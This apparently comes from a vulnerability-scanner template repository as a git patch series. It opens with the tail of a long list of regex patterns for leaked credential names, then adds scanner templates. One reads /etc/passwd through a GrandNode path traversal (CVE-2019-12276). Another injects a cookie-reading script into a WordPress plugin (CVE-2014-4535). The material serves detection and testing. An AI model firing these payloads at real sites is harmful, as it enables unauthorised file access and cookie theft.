"(?i)node[_-]?pre[_-]?gyp[_-]?github[_-]?token(=| =|:| :)" + - "(?i)node[_-]?pre[_-]?gyp[_-]?accesskeyid(=| =|:| :)" + - "(?i)node[_-]?env(=| =|:| :)" + - "(?i)ngrok[_-]?token(=| =|:| :)" + - "(?i)ngrok[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)nexuspassword(=| =|:| :)" + - "(?i)nexus[_-]?password(=| =|:| :)" + - "(?i)new[_-]?relic[_-]?beta[_-]?token(=| =|:| :)" + - "(?i)netlify[_-]?api[_-]?key(=| =|:| :)" + - "(?i)nativeevents(=| =|:| :)" + - "(?i)mysqlsecret(=| =|:| :)" + - "(?i)mysqlmasteruser(=| =|:| :)" + - "(?i)mysql[_-]?username(=| =|:| :)" + - "(?i)mysql[_-]?user(=| =|:| :)" + - "(?i)mysql[_-]?root[_-]?password(=| =|:| :)" + - "(?i)mysql[_-]?password(=| =|:| :)" + - "(?i)mysql[_-]?hostname(=| =|:| :)" + - "(?i)mysql[_-]?database(=| =|:| :)" + - "(?i)my[_-]?secret[_-]?env(=| =|:| :)" + - "(?i)multi[_-]?workspace[_-]?sid(=| =|:| :)" + - "(?i)multi[_-]?workflow[_-]?sid(=| =|:| :)" + - "(?i)multi[_-]?disconnect[_-]?sid(=| =|:| :)" + - "(?i)multi[_-]?connect[_-]?sid(=| =|:| :)" + - "(?i)multi[_-]?bob[_-]?sid(=| =|:| :)" + - "(?i)minio[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)minio[_-]?access[_-]?key(=| =|:| :)" + - "(?i)mile[_-]?zero[_-]?key(=| =|:| :)" + - "(?i)mh[_-]?password(=| =|:| :)" + - "(?i)mh[_-]?apikey(=| =|:| :)" + - "(?i)mg[_-]?public[_-]?api[_-]?key(=| =|:| :)" + - "(?i)mg[_-]?api[_-]?key(=| =|:| :)" + - "(?i)mapboxaccesstoken(=| =|:| :)" + - "(?i)mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)mapbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)mapbox[_-]?api[_-]?token(=| =|:| :)" + - "(?i)mapbox[_-]?access[_-]?token(=| =|:| :)" + - "(?i)manifest[_-]?app[_-]?url(=| =|:| :)" + - "(?i)manifest[_-]?app[_-]?token(=| =|:| :)" + - "(?i)mandrill[_-]?api[_-]?key(=| =|:| :)" + - "(?i)managementapiaccesstoken(=| =|:| :)" + - "(?i)management[_-]?token(=| =|:| :)" + - "(?i)manage[_-]?secret(=| =|:| :)" + - "(?i)manage[_-]?key(=| =|:| :)" + - "(?i)mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :)" + - "(?i)mailgun[_-]?pub[_-]?key(=| =|:| :)" + - "(?i)mailgun[_-]?pub[_-]?apikey(=| =|:| :)" + - "(?i)mailgun[_-]?priv[_-]?key(=| =|:| :)" + - "(?i)mailgun[_-]?password(=| =|:| :)" + - "(?i)mailgun[_-]?apikey(=| =|:| :)" + - "(?i)mailgun[_-]?api[_-]?key(=| =|:| :)" + - "(?i)mailer[_-]?password(=| =|:| :)" + - "(?i)mailchimp[_-]?key(=| =|:| :)" + - "(?i)mailchimp[_-]?api[_-]?key(=| =|:| :)" + - "(?i)mail[_-]?password(=| =|:| :)" + - "(?i)magento[_-]?password(=| =|:| :)" + - "(?i)magento[_-]?auth[_-]?username (=| =|:| :)" + - "(?i)magento[_-]?auth[_-]?password(=| =|:| :)" + - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password(=| =|:| :)" + - "(?i)lottie[_-]?upload[_-]?cert[_-]?key[_-]?password(=| =|:| :)" + - "(?i)lottie[_-]?s3[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)lottie[_-]?happo[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)lottie[_-]?happo[_-]?api[_-]?key(=| =|:| :)" + - "(?i)looker[_-]?test[_-]?runner[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)ll[_-]?shared[_-]?key(=| =|:| :)" + - "(?i)ll[_-]?publish[_-]?url(=| =|:| :)" + - "(?i)linux[_-]?signing[_-]?key(=| =|:| :)" + - "(?i)linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key(=| =|:| :)" + - "(?i)lighthouse[_-]?api[_-]?key(=| =|:| :)" + - "(?i)lektor[_-]?deploy[_-]?username(=| =|:| :)" + - "(?i)lektor[_-]?deploy[_-]?password(=| =|:| :)" + - "(?i)leanplum[_-]?key(=| =|:| :)" + - "(?i)kxoltsn3vogdop92m(=| =|:| :)" + - "(?i)kubeconfig(=| =|:| :)" + - "(?i)kubecfg[_-]?s3[_-]?path(=| =|:| :)" + - "(?i)kovan[_-]?private[_-]?key(=| =|:| :)" + - "(?i)keystore[_-]?pass(=| =|:| :)" + - "(?i)kafka[_-]?rest[_-]?url(=| =|:| :)" + - "(?i)kafka[_-]?instance[_-]?name(=| =|:| :)" + - "(?i)kafka[_-]?admin[_-]?url(=| =|:| :)" + - "(?i)jwt[_-]?secret(=| =|:| :)" + - "(?i)jdbc:mysql(=| =|:| :)" + - "(?i)jdbc[_-]?host(=| =|:| :)" + - "(?i)jdbc[_-]?databaseurl(=| =|:| :)" + - "(?i)itest[_-]?gh[_-]?token(=| =|:| :)" + - "(?i)ios[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)" + - "(?i)internal[_-]?secrets(=| =|:| :)" + - "(?i)integration[_-]?test[_-]?appid(=| =|:| :)" + - "(?i)integration[_-]?test[_-]?api[_-]?key(=| =|:| :)" + - "(?i)index[_-]?name(=| =|:| :)" + - "(?i)ij[_-]?repo[_-]?username(=| =|:| :)" + - "(?i)ij[_-]?repo[_-]?password(=| =|:| :)" + - "(?i)hub[_-]?dxia2[_-]?password(=| =|:| :)" + - "(?i)homebrew[_-]?github[_-]?api[_-]?token(=| =|:| :)" + - "(?i)hockeyapp[_-]?token(=| =|:| :)" + - "(?i)heroku[_-]?token(=| =|:| :)" + - "(?i)heroku[_-]?email(=| =|:| :)" + - "(?i)heroku[_-]?api[_-]?key(=| =|:| :)" + - "(?i)hb[_-]?codesign[_-]?key[_-]?pass(=| =|:| :)" + - "(?i)hb[_-]?codesign[_-]?gpg[_-]?pass(=| =|:| :)" + - "(?i)hab[_-]?key(=| =|:| :)" + - "(?i)hab[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)grgit[_-]?user(=| =|:| :)" + - "(?i)gren[_-]?github[_-]?token(=| =|:| :)" + - "(?i)gradle[_-]?signing[_-]?password(=| =|:| :)" + - "(?i)gradle[_-]?signing[_-]?key[_-]?id(=| =|:| :)" + - "(?i)gradle[_-]?publish[_-]?secret(=| =|:| :)" + - "(?i)gradle[_-]?publish[_-]?key(=| =|:| :)" + - "(?i)gpg[_-]?secret[_-]?keys(=| =|:| :)" + - "(?i)gpg[_-]?private[_-]?key(=| =|:| :)" + - "(?i)gpg[_-]?passphrase(=| =|:| :)" + - "(?i)gpg[_-]?ownertrust(=| =|:| :)" + - "(?i)gpg[_-]?keyname(=| =|:| :)" + - "(?i)gpg[_-]?key[_-]?name(=| =|:| :)" + - "(?i)google[_-]?private[_-]?key(=| =|:| :)" + - "(?i)google[_-]?maps[_-]?api[_-]?key(=| =|:| :)" + - "(?i)google[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)google[_-]?client[_-]?id(=| =|:| :)" + - "(?i)google[_-]?client[_-]?email(=| =|:| :)" + - "(?i)google[_-]?account[_-]?type(=| =|:| :)" + - "(?i)gogs[_-]?password(=| =|:| :)" + - "(?i)gitlab[_-]?user[_-]?email(=| =|:| :)" + - "(?i)github[_-]?tokens(=| =|:| :)" + - "(?i)github[_-]?token(=| =|:| :)" + - "(?i)github[_-]?repo(=| =|:| :)" + - "(?i)github[_-]?release[_-]?token(=| =|:| :)" + - "(?i)github[_-]?pwd(=| =|:| :)" + - "(?i)github[_-]?password(=| =|:| :)" + - "(?i)github[_-]?oauth[_-]?token(=| =|:| :)" + - "(?i)github[_-]?oauth(=| =|:| :)" + - "(?i)github[_-]?key(=| =|:| :)" + - "(?i)github[_-]?hunter[_-]?username(=| =|:| :)" + - "(?i)github[_-]?hunter[_-]?token(=| =|:| :)" + - "(?i)github[_-]?deployment[_-]?token(=| =|:| :)" + - "(?i)github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass(=| =|:| :)" + - "(?i)github[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)github[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)github[_-]?auth(=| =|:| :)" + - "(?i)github[_-]?api[_-]?token(=| =|:| :)" + - "(?i)github[_-]?api[_-]?key(=| =|:| :)" + - "(?i)github[_-]?access[_-]?token(=| =|:| :)" + - "(?i)git[_-]?token(=| =|:| :)" + - "(?i)git[_-]?name(=| =|:| :)" + - "(?i)git[_-]?email(=| =|:| :)" + - "(?i)git[_-]?committer[_-]?name(=| =|:| :)" + - "(?i)git[_-]?committer[_-]?email(=| =|:| :)" + - "(?i)git[_-]?author[_-]?name(=| =|:| :)" + - "(?i)git[_-]?author[_-]?email(=| =|:| :)" + - "(?i)ghost[_-]?api[_-]?key(=| =|:| :)" + - "(?i)ghb[_-]?token(=| =|:| :)" + - "(?i)gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)gh[_-]?token(=| =|:| :)" + - "(?i)gh[_-]?repo[_-]?token(=| =|:| :)" + - "(?i)gh[_-]?oauth[_-]?token(=| =|:| :)" + - "(?i)gh[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id(=| =|:| :)" + - "(?i)gh[_-]?next[_-]?oauth[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)gh[_-]?email(=| =|:| :)" + - "(?i)gh[_-]?api[_-]?key(=| =|:| :)" + - "(?i)gcs[_-]?bucket(=| =|:| :)" + - "(?i)gcr[_-]?password(=| =|:| :)" + - "(?i)gcloud[_-]?service[_-]?key(=| =|:| :)" + - "(?i)gcloud[_-]?project(=| =|:| :)" + - "(?i)gcloud[_-]?bucket(=| =|:| :)" + - "(?i)ftp[_-]?username(=| =|:| :)" + - "(?i)ftp[_-]?user(=| =|:| :)" + - "(?i)ftp[_-]?pw(=| =|:| :)" + - "(?i)ftp[_-]?password(=| =|:| :)" + - "(?i)ftp[_-]?login(=| =|:| :)" + - "(?i)ftp[_-]?host(=| =|:| :)" + - "(?i)fossa[_-]?api[_-]?key(=| =|:| :)" + - "(?i)flickr[_-]?api[_-]?secret(=| =|:| :)" + - "(?i)flickr[_-]?api[_-]?key(=| =|:| :)" + - "(?i)flask[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)firefox[_-]?secret(=| =|:| :)" + - "(?i)firebase[_-]?token(=| =|:| :)" + - "(?i)firebase[_-]?project[_-]?develop(=| =|:| :)" + - "(?i)firebase[_-]?key(=| =|:| :)" + - "(?i)firebase[_-]?api[_-]?token(=| =|:| :)" + - "(?i)firebase[_-]?api[_-]?json(=| =|:| :)" + - "(?i)file[_-]?password(=| =|:| :)" + - "(?i)exp[_-]?password(=| =|:| :)" + - "(?i)eureka[_-]?awssecretkey(=| =|:| :)" + - "(?i)env[_-]?sonatype[_-]?password(=| =|:| :)" + - "(?i)env[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)env[_-]?secret(=| =|:| :)" + - "(?i)env[_-]?key(=| =|:| :)" + - "(?i)env[_-]?heroku[_-]?api[_-]?key(=| =|:| :)" + - "(?i)env[_-]?github[_-]?oauth[_-]?token(=| =|:| :)" + - "(?i)end[_-]?user[_-]?password(=| =|:| :)" + - "(?i)encryption[_-]?password(=| =|:| :)" + - "(?i)elasticsearch[_-]?password(=| =|:| :)" + - "(?i)elastic[_-]?cloud[_-]?auth(=| =|:| :)" + - "(?i)dsonar[_-]?projectkey(=| =|:| :)" + - "(?i)dsonar[_-]?login(=| =|:| :)" + - "(?i)droplet[_-]?travis[_-]?password(=| =|:| :)" + - "(?i)dropbox[_-]?oauth[_-]?bearer(=| =|:| :)" + - "(?i)doordash[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)dockerhubpassword(=| =|:| :)" + - "(?i)dockerhub[_-]?password(=| =|:| :)" + - "(?i)docker[_-]?token(=| =|:| :)" + - "(?i)docker[_-]?postgres[_-]?url(=| =|:| :)" + - "(?i)docker[_-]?password(=| =|:| :)" + - "(?i)docker[_-]?passwd(=| =|:| :)" + - "(?i)docker[_-]?pass(=| =|:| :)" + - "(?i)docker[_-]?key(=| =|:| :)" + - "(?i)docker[_-]?hub[_-]?password(=| =|:| :)" + - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?ids(=| =|:| :)" + - "(?i)digitalocean[_-]?ssh[_-]?key[_-]?body(=| =|:| :)" + - "(?i)digitalocean[_-]?access[_-]?token(=| =|:| :)" + - "(?i)dgpg[_-]?passphrase(=| =|:| :)" + - "(?i)deploy[_-]?user(=| =|:| :)" + - "(?i)deploy[_-]?token(=| =|:| :)" + - "(?i)deploy[_-]?secure(=| =|:| :)" + - "(?i)deploy[_-]?password(=| =|:| :)" + - "(?i)ddgc[_-]?github[_-]?token(=| =|:| :)" + - "(?i)ddg[_-]?test[_-]?email[_-]?pw(=| =|:| :)" + - "(?i)ddg[_-]?test[_-]?email(=| =|:| :)" + - "(?i)db[_-]?username(=| =|:| :)" + - "(?i)db[_-]?user(=| =|:| :)" + - "(?i)db[_-]?pw(=| =|:| :)" + - "(?i)db[_-]?password(=| =|:| :)" + - "(?i)db[_-]?host(=| =|:| :)" + - "(?i)db[_-]?database(=| =|:| :)" + - "(?i)db[_-]?connection(=| =|:| :)" + - "(?i)datadog[_-]?app[_-]?key(=| =|:| :)" + - "(?i)datadog[_-]?api[_-]?key(=| =|:| :)" + - "(?i)database[_-]?username(=| =|:| :)" + - "(?i)database[_-]?user(=| =|:| :)" + - "(?i)database[_-]?port(=| =|:| :)" + - "(?i)database[_-]?password(=| =|:| :)" + - "(?i)database[_-]?name(=| =|:| :)" + - "(?i)database[_-]?host(=| =|:| :)" + - "(?i)danger[_-]?github[_-]?api[_-]?token(=| =|:| :)" + - "(?i)cypress[_-]?record[_-]?key(=| =|:| :)" + - "(?i)coverity[_-]?scan[_-]?token(=| =|:| :)" + - "(?i)coveralls[_-]?token(=| =|:| :)" + - "(?i)coveralls[_-]?repo[_-]?token(=| =|:| :)" + - "(?i)coveralls[_-]?api[_-]?token(=| =|:| :)" + - "(?i)cos[_-]?secrets(=| =|:| :)" + - "(?i)conversation[_-]?username(=| =|:| :)" + - "(?i)conversation[_-]?password(=| =|:| :)" + - "(?i)contentful[_-]?v2[_-]?access[_-]?token(=| =|:| :)" + - "(?i)contentful[_-]?test[_-]?org[_-]?cma[_-]?token(=| =|:| :)" + - "(?i)contentful[_-]?php[_-]?management[_-]?test[_-]?token(=| =|:| :)" + - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new(=| =|:| :)" + - "(?i)contentful[_-]?management[_-]?api[_-]?access[_-]?token(=| =|:| :)" + - "(?i)contentful[_-]?integration[_-]?management[_-]?token(=| =|:| :)" + - "(?i)contentful[_-]?cma[_-]?test[_-]?token(=| =|:| :)" + - "(?i)contentful[_-]?access[_-]?token(=| =|:| :)" + - "(?i)consumerkey(=| =|:| :)" + - "(?i)consumer[_-]?key(=| =|:| :)" + - "(?i)conekta[_-]?apikey(=| =|:| :)" + - "(?i)coding[_-]?token(=| =|:| :)" + - "(?i)codecov[_-]?token(=| =|:| :)" + - "(?i)codeclimate[_-]?repo[_-]?token(=| =|:| :)" + - "(?i)codacy[_-]?project[_-]?token(=| =|:| :)" + - "(?i)cocoapods[_-]?trunk[_-]?token(=| =|:| :)" + - "(?i)cocoapods[_-]?trunk[_-]?email(=| =|:| :)" + - "(?i)cn[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)cn[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)clu[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)" + - "(?i)clu[_-]?repo[_-]?url(=| =|:| :)" + - "(?i)cloudinary[_-]?url[_-]?staging(=| =|:| :)" + - "(?i)cloudinary[_-]?url(=| =|:| :)" + - "(?i)cloudflare[_-]?email(=| =|:| :)" + - "(?i)cloudflare[_-]?auth[_-]?key(=| =|:| :)" + - "(?i)cloudflare[_-]?auth[_-]?email(=| =|:| :)" + - "(?i)cloudflare[_-]?api[_-]?key(=| =|:| :)" + - "(?i)cloudant[_-]?service[_-]?database(=| =|:| :)" + - "(?i)cloudant[_-]?processed[_-]?database(=| =|:| :)" + - "(?i)cloudant[_-]?password(=| =|:| :)" + - "(?i)cloudant[_-]?parsed[_-]?database(=| =|:| :)" + - "(?i)cloudant[_-]?order[_-]?database(=| =|:| :)" + - "(?i)cloudant[_-]?instance(=| =|:| :)" + - "(?i)cloudant[_-]?database(=| =|:| :)" + - "(?i)cloudant[_-]?audited[_-]?database(=| =|:| :)" + - "(?i)cloudant[_-]?archived[_-]?database(=| =|:| :)" + - "(?i)cloud[_-]?api[_-]?key(=| =|:| :)" + - "(?i)clojars[_-]?password(=| =|:| :)" + - "(?i)client[_-]?secret(=| =|:| :)" + - "(?i)cli[_-]?e2e[_-]?cma[_-]?token(=| =|:| :)" + - "(?i)claimr[_-]?token(=| =|:| :)" + - "(?i)claimr[_-]?superuser(=| =|:| :)" + - "(?i)claimr[_-]?db(=| =|:| :)" + - "(?i)claimr[_-]?database(=| =|:| :)" + - "(?i)ci[_-]?user[_-]?token(=| =|:| :)" + - "(?i)ci[_-]?server[_-]?name(=| =|:| :)" + - "(?i)ci[_-]?registry[_-]?user(=| =|:| :)" + - "(?i)ci[_-]?project[_-]?url(=| =|:| :)" + - "(?i)ci[_-]?deploy[_-]?password(=| =|:| :)" + - "(?i)chrome[_-]?refresh[_-]?token(=| =|:| :)" + - "(?i)chrome[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)cheverny[_-]?token(=| =|:| :)" + - "(?i)cf[_-]?password(=| =|:| :)" + - "(?i)certificate[_-]?password(=| =|:| :)" + - "(?i)censys[_-]?secret(=| =|:| :)" + - "(?i)cattle[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)cattle[_-]?agent[_-]?instance[_-]?auth(=| =|:| :)" + - "(?i)cattle[_-]?access[_-]?key(=| =|:| :)" + - "(?i)cargo[_-]?token(=| =|:| :)" + - "(?i)cache[_-]?s3[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)bx[_-]?username(=| =|:| :)" + - "(?i)bx[_-]?password(=| =|:| :)" + - "(?i)bundlesize[_-]?github[_-]?token(=| =|:| :)" + - "(?i)built[_-]?branch[_-]?deploy[_-]?key(=| =|:| :)" + - "(?i)bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)browserstack[_-]?access[_-]?key(=| =|:| :)" + - "(?i)browser[_-]?stack[_-]?access[_-]?key(=| =|:| :)" + - "(?i)brackets[_-]?repo[_-]?oauth[_-]?token(=| =|:| :)" + - "(?i)bluemix[_-]?username(=| =|:| :)" + - "(?i)bluemix[_-]?pwd(=| =|:| :)" + - "(?i)bluemix[_-]?password(=| =|:| :)" + - "(?i)bluemix[_-]?pass[_-]?prod(=| =|:| :)" + - "(?i)bluemix[_-]?pass(=| =|:| :)" + - "(?i)bluemix[_-]?auth(=| =|:| :)" + - "(?i)bluemix[_-]?api[_-]?key(=| =|:| :)" + - "(?i)bintraykey(=| =|:| :)" + - "(?i)bintray[_-]?token(=| =|:| :)" + - "(?i)bintray[_-]?key(=| =|:| :)" + - "(?i)bintray[_-]?gpg[_-]?password(=| =|:| :)" + - "(?i)bintray[_-]?apikey(=| =|:| :)" + - "(?i)bintray[_-]?api[_-]?key(=| =|:| :)" + - "(?i)b2[_-]?bucket(=| =|:| :)" + - "(?i)b2[_-]?app[_-]?key(=| =|:| :)" + - "(?i)awssecretkey(=| =|:| :)" + - "(?i)awscn[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)awscn[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)awsaccesskeyid(=| =|:| :)" + - "(?i)aws[_-]?ses[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)aws[_-]?ses[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)aws[_-]?secrets(=| =|:| :)" + - "(?i)aws[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)aws[_-]?secret(=| =|:| :)" + - "(?i)aws[_-]?key(=| =|:| :)" + - "(?i)aws[_-]?config[_-]?secretaccesskey(=| =|:| :)" + - "(?i)aws[_-]?config[_-]?accesskeyid(=| =|:| :)" + - "(?i)aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)aws[_-]?access[_-]?key(=| =|:| :)" + - "(?i)aws[_-]?access(=| =|:| :)" + - "(?i)author[_-]?npm[_-]?api[_-]?key(=| =|:| :)" + - "(?i)author[_-]?email[_-]?addr(=| =|:| :)" + - "(?i)auth0[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)auth0[_-]?api[_-]?clientsecret(=| =|:| :)" + - "(?i)auth[_-]?token(=| =|:| :)" + - "(?i)assistant[_-]?iam[_-]?apikey(=| =|:| :)" + - "(?i)artifacts[_-]?secret(=| =|:| :)" + - "(?i)artifacts[_-]?key(=| =|:| :)" + - "(?i)artifacts[_-]?bucket(=| =|:| :)" + - "(?i)artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)artifacts[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)artifactory[_-]?key(=| =|:| :)" + - "(?i)argos[_-]?token(=| =|:| :)" + - "(?i)apple[_-]?id[_-]?password(=| =|:| :)" + - "(?i)appclientsecret(=| =|:| :)" + - "(?i)app[_-]?token(=| =|:| :)" + - "(?i)app[_-]?secrete(=| =|:| :)" + - "(?i)app[_-]?report[_-]?token[_-]?key(=| =|:| :)" + - "(?i)app[_-]?bucket[_-]?perm(=| =|:| :)" + - "(?i)apigw[_-]?access[_-]?token(=| =|:| :)" + - "(?i)apiary[_-]?api[_-]?key(=| =|:| :)" + - "(?i)api[_-]?secret(=| =|:| :)" + - "(?i)api[_-]?key[_-]?sid(=| =|:| :)" + - "(?i)api[_-]?key[_-]?secret(=| =|:| :)" + - "(?i)api[_-]?key(=| =|:| :)" + - "(?i)aos[_-]?sec(=| =|:| :)" + - "(?i)aos[_-]?key(=| =|:| :)" + - "(?i)ansible[_-]?vault[_-]?password(=| =|:| :)" + - "(?i)android[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)" + - "(?i)anaconda[_-]?token(=| =|:| :)" + - "(?i)amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)amazon[_-]?bucket[_-]?name(=| =|:| :)" + - "(?i)alicloud[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)alicloud[_-]?access[_-]?key(=| =|:| :)" + - "(?i)alias[_-]?pass(=| =|:| :)" + - "(?i)algolia[_-]?search[_-]?key[_-]?1(=| =|:| :)" + - "(?i)algolia[_-]?search[_-]?key(=| =|:| :)" + - "(?i)algolia[_-]?search[_-]?api[_-]?key(=| =|:| :)" + - "(?i)algolia[_-]?api[_-]?key[_-]?search(=| =|:| :)" + - "(?i)algolia[_-]?api[_-]?key[_-]?mcm(=| =|:| :)" + - "(?i)algolia[_-]?api[_-]?key(=| =|:| :)" + - "(?i)algolia[_-]?admin[_-]?key[_-]?mcm(=| =|:| :)" + - "(?i)algolia[_-]?admin[_-]?key[_-]?2(=| =|:| :)" + - "(?i)algolia[_-]?admin[_-]?key[_-]?1(=| =|:| :)" + - "(?i)adzerk[_-]?api[_-]?key(=| =|:| :)" + - "(?i)admin[_-]?email(=| =|:| :)" + - "(?i)account[_-]?sid(=| =|:| :)" + - "(?i)access[_-]?token(=| =|:| :)" + - "(?i)access[_-]?secret(=| =|:| :)" + - "(?i)access[_-]?key[_-]?secret(=| =|:| :)" From a70533844505a09a5b17bea3beb9beec8a114cd6 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 30 Jul 2021 01:41:46 +0530 Subject: [PATCH 1301/4083] Update camunda-login-panel.yaml --- exposed-panels/camunda-login-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml index 762fd13c9e..ca5b5f04c2 100644 --- a/exposed-panels/camunda-login-panel.yaml +++ b/exposed-panels/camunda-login-panel.yaml @@ -3,7 +3,7 @@ info: name: Camunda Login panel author: alifathi-h1 severity: info - description: Default Credentials of demo:demo on Camunda application. + description: Default Credentials of demo:demo on Camunda application. reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ tags: camunda,panel From 189f59ba9db409f6e960691c11a11765a942b496 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 30 Jul 2021 05:49:59 +0700 Subject: [PATCH 1302/4083] Create CVE-2019-12276.yaml --- cves/2019/CVE-2019-12276.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2019/CVE-2019-12276.yaml diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml new file mode 100644 index 0000000000..151e991888 --- /dev/null +++ b/cves/2019/CVE-2019-12276.yaml @@ -0,0 +1,27 @@ +id: CVE-2019-12276 + +info: + name: GrandNode 4.40 - Path Traversal + author: daffainfo + severity: high + description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. + reference: | + - https://security401.com/grandnode-path-traversal/ + - https://www.cvedetails.com/cve/CVE-2019-12276 + tags: cve,cve2019,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 010f1a8700cf1dcf79cb4a7b86b89b17a05ee1ea Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 30 Jul 2021 05:51:07 +0700 Subject: [PATCH 1303/4083] Create CVE-2014-4535.yaml --- cves/2014/CVE-2014-4535.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2014/CVE-2014-4535.yaml diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml new file mode 100644 index 0000000000..1d1a8fe91a --- /dev/null +++ b/cves/2014/CVE-2014-4535.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-4535 + +info: + name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd + - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 7cb6e09b25145948074ab7e4907dc8f48526677e Mon Sep 17 00:00:00 2001 From: Florian Pfitzer Date: Fri, 30 Jul 2021 07:38:44 +0200 Subject: [PATCH 1304/4083] Add id to getsimple-cms-detector --- technologies/getsimple-cms-detector.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml index 4fe0fa1917..95ed07e8c1 100644 --- a/technologies/getsimple-cms-detector.yaml +++ b/technologies/getsimple-cms-detector.yaml @@ -1,3 +1,5 @@ +id: getsimple-cms-detector + info: name: GetSimple CMS Detector author: philippedelteil From a7f75416f0f9b2417b5d056f0a9b1f206994a37b Mon Sep 17 00:00:00 2001 From: nxnjz <43261757+nxnjz@users.noreply.github.com> Date: Fri, 30 Jul 2021 13:16:30 +0300 Subject: [PATCH 1305/4083] Update and rename appsec-yml-disclosure.yaml to appspec-yml-disclosure.yaml --- ...appsec-yml-disclosure.yaml => appspec-yml-disclosure.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposures/configs/{appsec-yml-disclosure.yaml => appspec-yml-disclosure.yaml} (90%) diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appspec-yml-disclosure.yaml similarity index 90% rename from exposures/configs/appsec-yml-disclosure.yaml rename to exposures/configs/appspec-yml-disclosure.yaml index d036de812b..a0229fc7c8 100644 --- a/exposures/configs/appsec-yml-disclosure.yaml +++ b/exposures/configs/appspec-yml-disclosure.yaml @@ -1,7 +1,7 @@ -id: appsec-yml-disclosure +id: appspec-yml-disclosure info: - name: Appsec Yml Disclosure + name: Appspec Yml Disclosure author: dhiyaneshDk severity: medium reference: 